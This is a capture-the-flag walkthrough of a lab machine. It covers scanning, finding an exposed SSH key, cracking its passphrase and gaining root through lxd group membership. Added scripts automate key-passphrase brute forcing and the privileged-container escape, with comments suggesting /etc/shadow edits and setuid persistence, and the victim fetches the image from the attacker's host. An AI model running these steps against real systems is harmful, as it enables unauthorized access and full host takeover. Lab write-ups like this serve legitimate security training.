# Gaming Server

![](/files/-Mbc2OY2lvmmkk66LE5J)

## Reconnaissance

Initial nmap scan to find open ports, using the flag **-Pn** ("treat all hosts as alive"), which skips host discovery so nmap still scans the target even if it drops the ICMP probes.

```
nmap -Pn 10.10.9.5
```

![](/files/-MbcuAnHxUEgPbLL7nbw)

Detailed Nmap scan:

Command breakdown:

* (**-sV**): Service version detection
* (**-sC**): Default nmap scripts
* (**-p**): Specifying ports 22,80
* (**-oN nmap**): Saving the output into a file called nmap

```
nmap -sV -sC -p 22,80 -oN nmap 10.10.9.5
```

![](/files/-MbcuKzKvnm5Ug0AtSN7)
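As an added example (not part of the original writeup), the two scans above chained into one POSIX shell script: the quick `-Pn` sweep is run in grepable (`-oG`) mode, the open TCP ports are parsed out of it, and only those ports are handed to the detailed `-sV -sC` scan. The function names `open_ports` and `scan` are chosen here, the script assumes nmap is installed, and the grepable line quoted in the comment is a constructed sample.

```shell
#!/bin/sh
# Added example (not from the original writeup): chain a fast -Pn sweep into
# the detailed -sV -sC scan by parsing nmap's grepable (-oG) output, so the
# second scan only targets the ports the first one reported open.

# Read -oG output on stdin and print the open TCP ports as "22,80".
# A constructed grepable line looks like:
#   Host: 10.10.9.5 ()  Ports: 22/open/tcp//ssh///, 80/open/tcp//http///
# Filtered or closed ports ("443/filtered/tcp") do not match the pattern.
open_ports() {
    tr ',' '\n' |
        grep -o '[0-9]*/open/tcp' |
        cut -d/ -f1 |
        sort -n -u |
        paste -s -d ',' -
}

# Run both phases against one target (assumes nmap is on PATH).
# -oG - sends the grepable report to stdout for parsing.
scan() {
    target="$1"
    ports=$(nmap -Pn -oG - "$target" | open_ports)
    if [ -z "$ports" ]; then
        echo "no open TCP ports found on $target" >&2
        return 1
    fi
    nmap -Pn -sV -sC -p "$ports" -oN nmap "$target"
}
```

Usage is `scan 10.10.9.5`; the detailed report lands in the file `nmap` exactly as in the manual command above, but the port list no longer has to be copied by hand.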

## Enumeration

Let's visit the website.

![](/files/-MbcuqShGOqdyiW8BMas)

It's a fully functional website with nothing of interest at first glance, but looking at the page source we find something interesting.

![](/files/-MbcvBS6G7cOqrvcnS6q)

We have a username, `John`. Let's run gobuster to find hidden directories and pages.

```
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.9.5
```

![](/files/-Mbcw5BfTITiD7qwRPUo)

We find two directories. The secret directory looks like it has more files, so let's run a gobuster scan against it, this time also looking for php, html and txt files.

```
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.9.5/secret -x php,html,txt
```

Let's now explore these directories.

![](/files/-MbcxBK_XYkpobO9y_g-)

The uploads directory looks like a directory of files that have been uploaded to the web server. Let's download the three files we see here.

```
wget http://10.10.9.5/uploads/<file-name>
```

![](/files/-MbcxxQuFD6ckfr-csSu)

Let's look at the files.

First the `dict.lst` file: it looks like a password list, so it is worth keeping as a wordlist for anything we need to crack later. The second file is interesting to read but nothing that will help us, and the third file is a meme.

Now let's look at the secret directory.

![](/files/-Mbd-1Yp8c_U_dbuvCcl)

Let's download this file.

```
wget http://10.10.9.5/secret/secretKey
```

![](/files/-Mbd-IpbDB29YPZV_G87)

Let's read the file.

![](/files/-Mbd-NGHaj7KwkOjQXCg)

It's an RSA private key protected by a passphrase, so let's use `ssh2john` to turn it into a hash we can crack, recover the passphrase and then log in over SSH.

## Exploitation

Let's use `ssh2john` to extract the hash so that we can crack the passphrase with john.

```
/usr/share/john/ssh2john.py secretKey > hash
```

Now let's crack the passphrase (rockyou is used here; the `dict.lst` we found in `/uploads` would be a smaller first candidate).

```
john --wordlist=/usr/share/wordlists/rockyou.txt hash
```

![](/files/-Mbd-yRKokToCoimBOO3)
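The same dictionary attack without ssh2john and john, as an added example that is not part of the original writeup: `ssh-keygen -y` only prints the public key when it can decrypt the private key, so its exit status tells us whether a candidate passphrase is right. The function name `crack_ssh_key` is chosen here; the script assumes OpenSSH's `ssh-keygen` is installed and takes the key file and wordlist as arguments.

```shell
#!/bin/sh
# Added example (not from the original writeup): dictionary attack against an
# encrypted SSH private key using ssh-keygen instead of ssh2john + john.
# Assumes ssh-keygen (OpenSSH) is on PATH.

# crack_ssh_key KEYFILE WORDLIST
# Prints the passphrase and returns 0 on success, 1 if the wordlist is
# exhausted, 2 if the key is not passphrase-protected at all.
crack_ssh_key() {
    keyfile="$1"
    wordlist="$2"

    # Edge case: an unencrypted key accepts any passphrase, so every
    # candidate would "succeed". Detect that first with an empty passphrase.
    if ssh-keygen -y -P '' -f "$keyfile" >/dev/null 2>&1; then
        echo "key is not passphrase-protected" >&2
        return 2
    fi

    # "|| [ -n ... ]" keeps the last line even if the file lacks a newline.
    while IFS= read -r candidate || [ -n "$candidate" ]; do
        [ -z "$candidate" ] && continue
        # -y: print the public key derived from the private key;
        # -P: passphrase to try. Wrong passphrase => non-zero exit.
        if ssh-keygen -y -P "$candidate" -f "$keyfile" >/dev/null 2>&1; then
            printf '%s\n' "$candidate"
            return 0
        fi
    done < "$wordlist"
    return 1
}
```

This forks one process per candidate, so it is fine for a list the size of `dict.lst` but far slower than john on rockyou; john's `ssh` format does the key derivation in-process and is the right tool for large wordlists.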

We found the passphrase, so let's log in over SSH, but first there is one step: ssh refuses a private key that is readable by other users, so the file's permissions must be restricted.

```
chmod 600 secretKey
```

And now we can log in, entering the cracked passphrase when prompted.

```
ssh -i secretKey john@10.10.9.5
```

![](/files/-Mbd0ILrD_H3XANVB_wr)

We can now read the `user.txt` file.

![](/files/-Mbd0PX-MafDb593OzaY)

## Privilege Escalation

Let's run the `id` command, as we cannot use `sudo` without john's account password.

```
id
```

![](/files/-Mbd0gFCVlhKwCnzXPl_)

Looking closely we can see that john is part of the `lxd` group. lxd is a Linux container manager, and a member of the `lxd` group can create a privileged container and mount the host's root filesystem inside it, which is effectively root on the host (LXD's own documentation warns that access to the LXD socket should be treated as root-equivalent). There is an [article ](https://www.hackingarticles.in/lxd-privilege-escalation/)on this topic which shows how to escalate to root with the permissions we currently have. I highly recommend reading the [article ](https://www.hackingarticles.in/lxd-privilege-escalation/)as they explain it very well.

![](/files/-Mbd22OioNTxuFFESe3l)

These are the steps that we have to follow. First we need to build the Alpine image on our own machine, as I think we can't download files on the victim machine directly; the builder can be found [here](https://github.com/saghul/lxd-alpine-builder.git).

```
git clone https://github.com/saghul/lxd-alpine-builder.git
```

![](/files/-Mbd34ERt0gVn82Dn_11)

Now we have to change into the directory we just cloned and run `build-alpine`. The script creates the Alpine root filesystem itself, so it has to be run as root.

```
cd lxd-alpine-builder
sudo ./build-alpine
```

After running it, a `tar.gz` file is created in the build directory. Now we have to transfer it to the victim machine, so let's start an HTTP server in that directory so that the file can be fetched with `wget`.

```
python3 -m http.server 8000
```

![](/files/-Mbd3p9dpzojDYWKRiwg)

Now on the victim machine, first change into the `/tmp` directory, as we are going to place all temporary files there, and then download the file.

```
cd /tmp
wget http://<your-ip>:8000/alpine-v3.13-x86_64-20210607_2042.tar.gz
```

![](/files/-Mbd4ZeToN-LvBQl_sMy)

Now that the image is on the victim, it can be added as an image to `LXD` with this command.

```
lxc image import alpine-v3.13-x86_64-20210607_2042.tar.gz --alias myimage
```

![](/files/-Mbd55zhbVDrzgMaSxcB)

Let's check the list of images using this command.

```
lxc image list
```

![](/files/-Mbd5DtvlFj2jgYYjUYq)

Now we need to use the following commands to escalate privileges to root. The privileged flag is what makes this work: root inside the container is uid 0 on the host, not a remapped unprivileged uid, so the mounted host filesystem is fully writable.

```
lxc init myimage ignite -c security.privileged=true        # container root == host root
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true   # host / at /mnt/root
lxc start ignite
lxc exec ignite /bin/sh
id
```

![](/files/-Mbd5Wgk_4y9FA7cmX7Q)

Now you are root inside the container, and since the host's filesystem is mounted at `/mnt/root`, the host's `/root` directory is at `/mnt/root/root`, which is where the root flag can be read.

![](/files/-Mbd5gr0xVsLw9DItqXR)
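The whole escalation above as one script, added here as an example that is not part of the original writeup: it checks `lxd` group membership and that `lxc` is available, imports the image only if the alias is not already present (so a re-run does not fail), then creates the privileged container with the host root mounted and drops into a shell. The function names `in_lxd_group` and `lxd_escape`, the device name `hostroot` and the default alias and container names are choices made here; the script assumes the image tarball has already been copied to the victim.

```shell
#!/bin/sh
# Added example (not from the original writeup): the LXD privilege-escalation
# steps as one script with the pre-flight checks a practitioner wants.
# Assumes lxc is on PATH and the Alpine tarball is already on the victim.

# in_lxd_group "GROUP LIST": true if "lxd" appears in a space-separated
# group list such as the output of `id -nG`.
in_lxd_group() {
    for g in $1; do
        [ "$g" = "lxd" ] && return 0
    done
    return 1
}

# lxd_escape IMAGE_TAR [ALIAS] [CONTAINER]
# Mounts the host root filesystem into a privileged container and execs a
# shell in it. Returns non-zero if any prerequisite or lxc step fails.
lxd_escape() {
    image_tar="$1"
    alias="${2:-myimage}"
    ctr="${3:-ignite}"

    if ! in_lxd_group "$(id -nG)"; then
        echo "current user is not in the lxd group" >&2
        return 1
    fi
    command -v lxc >/dev/null 2>&1 || { echo "lxc not found on PATH" >&2; return 1; }
    [ -f "$image_tar" ] || { echo "image $image_tar not found" >&2; return 1; }

    # Import only when the alias is not already known, so re-running is safe.
    if ! lxc image info "$alias" >/dev/null 2>&1; then
        lxc image import "$image_tar" --alias "$alias" || return 1
    fi

    # security.privileged=true: uid 0 in the container is uid 0 on the host,
    # so anything written through the mount below is owned by host root.
    lxc init "$alias" "$ctr" -c security.privileged=true || return 1
    # Expose the entire host filesystem at /mnt/root inside the container.
    lxc config device add "$ctr" hostroot disk source=/ path=/mnt/root recursive=true || return 1
    lxc start "$ctr" || return 1

    # Inside: /mnt/root/root/root.txt is readable, /mnt/root/etc/shadow is
    # writable, and a setuid copy of /bin/bash can be dropped for persistence.
    lxc exec "$ctr" -- /bin/sh
}
```

Usage on the victim is `lxd_escape /tmp/alpine-v3.13-x86_64-20210607_2042.tar.gz`. The defensive takeaway is the group check itself: any account in `lxd` can do this, so membership should be audited like `sudo` membership.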

